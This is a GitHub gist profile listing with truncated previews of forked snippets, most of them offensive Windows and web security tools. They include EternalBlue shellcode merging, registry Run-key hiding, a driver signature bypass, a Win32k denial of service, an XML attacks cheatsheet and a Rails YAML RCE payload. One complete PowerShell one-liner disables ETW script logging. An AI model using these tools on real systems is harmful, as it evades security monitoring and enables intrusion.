Skip to content

Instantly share code, notes, and snippets.

View CaledoniaProject's full-sized avatar

CaledoniaProject

655 followers · 204 following
View GitHub Profile
@CaledoniaProject
CaledoniaProject / reclaimWindows10.ps1
Created January 10, 2017 05:22 — forked from alirobe/reclaimWindows10.ps1
"Reclaim Windows 10" turns off a bunch of unnecessary Windows 10 telemetery, removes bloatware, and privacy invasions. Review and tweak before running. Scripts for reversing are included and commented. Fork via https://github.com/Disassembler0 (different defaults)
##########
# Win10 Initial Setup Script
# Author: Disassembler <disassembler@dasm.cz>
# Version: 1.7, 2016-08-15
# dasm's script: https://github.com/Disassembler0/Win10-Initial-Setup-Script/
# THIS IS A PERSONALIZED VERSION
# This script leaves more MS defaults on, including MS security features.
# Tweaked based on personal preferences for @alirobe 2016-11-16 - v1.7.1
@CaledoniaProject
CaledoniaProject / calling_printf_osx.c
Created March 27, 2017 07:22 — forked from P1kachu/calling_printf_osx.c
Calling printf in OSX - The overkill way
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <mach-o/dyld.h>
#include <mach-o/nlist.h>
#include <mach-o/dyld_images.h>
#include <mach/mach_vm.h>
/* Dyld is the OSX Dynamic Linker
* /usr/include//mach-o/loader.h
@CaledoniaProject
CaledoniaProject / eternalblue_merge_shellcode.py
Created June 6, 2017 07:05 — forked from worawit/eternalblue_merge_shellcode.py
Windows x64 and x86 kernel shellcode for eternalblue exploit
import sys
from struct import pack
if len(sys.argv) < 4:
print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
@CaledoniaProject
CaledoniaProject / PSReflect-RegHide.ps1
Created July 18, 2017 11:06 — forked from brianreitz/PSReflect-RegHide.ps1
PowerShell script to hide a Run key like Reghide/Kovter/Poweliks
# requires PSReflect.ps1 to be in the same directory as this script
. .\PSReflect.ps1
$Module = New-InMemoryModule -ModuleName RegHide
# Define our structs.
# https://msdn.microsoft.com/en-us/library/windows/hardware/ff564879(v=vs.85).aspx
# typedef struct _UNICODE_STRING {
# USHORT Length;
# USHORT MaximumLength;
@CaledoniaProject
CaledoniaProject / main.c
Created July 25, 2017 09:08 — forked from hfiref0x/main.c
NtLoadEnclaveData Windows 10 RS3 DSE bypass
// Original source link https://twitter.com/hFireF0X/status/887930221466443776
// If you are here from any other link - do know that they just steal original info without giving any credit to source
#include "global.h"
HINSTANCE g_hInstance;
HANDLE g_ConOut = NULL;
BOOL g_ConsoleOutput = FALSE;
WCHAR g_BE = 0xFEFF;
RTL_OSVERSIONINFOW g_osv;
@CaledoniaProject
CaledoniaProject / WDAG_CI_Policy.xml
Created October 22, 2017 00:54 — forked from mattifestation/WDAG_CI_Policy.xml
Recovered Windows Defender Application Guard Hyper-V Container Code Integrity Policy
<?xml version="1.0"?>
<SiPolicy xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="urn:schemas-microsoft-com:sipolicy">
<VersionEx>10.0.0.0</VersionEx>
<PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
<Rules>
<Rule>
<Option>Enabled:UMCI</Option>
</Rule>
<Rule>
@CaledoniaProject
CaledoniaProject / KillETW.ps1
Created November 17, 2017 11:13 — forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
@CaledoniaProject
CaledoniaProject / NtUserOpenDesktop.c
Created November 30, 2017 07:37 — forked from hfiref0x/NtUserOpenDesktop.c
Win32k NtUserOpenDesktop Denial Of Service (9200-17046)
/*
Win32k NtUserOpenDesktop->OpenDesktop Denial Of Service feature.
Working range: x64 Windows 8 (9200) up to Windows 10 RS4 (17046).
x86 versions not tested.
Feature:
@CaledoniaProject
CaledoniaProject / xml-attacks.md
Created December 9, 2017 03:00 — forked from mgeeky/xml-attacks.md
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.

@CaledoniaProject
CaledoniaProject / railspwn.rb
Created December 17, 2017 07:44 — forked from niklasb/railspwn.rb
Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end
class DeprecatedInstanceVariableProxy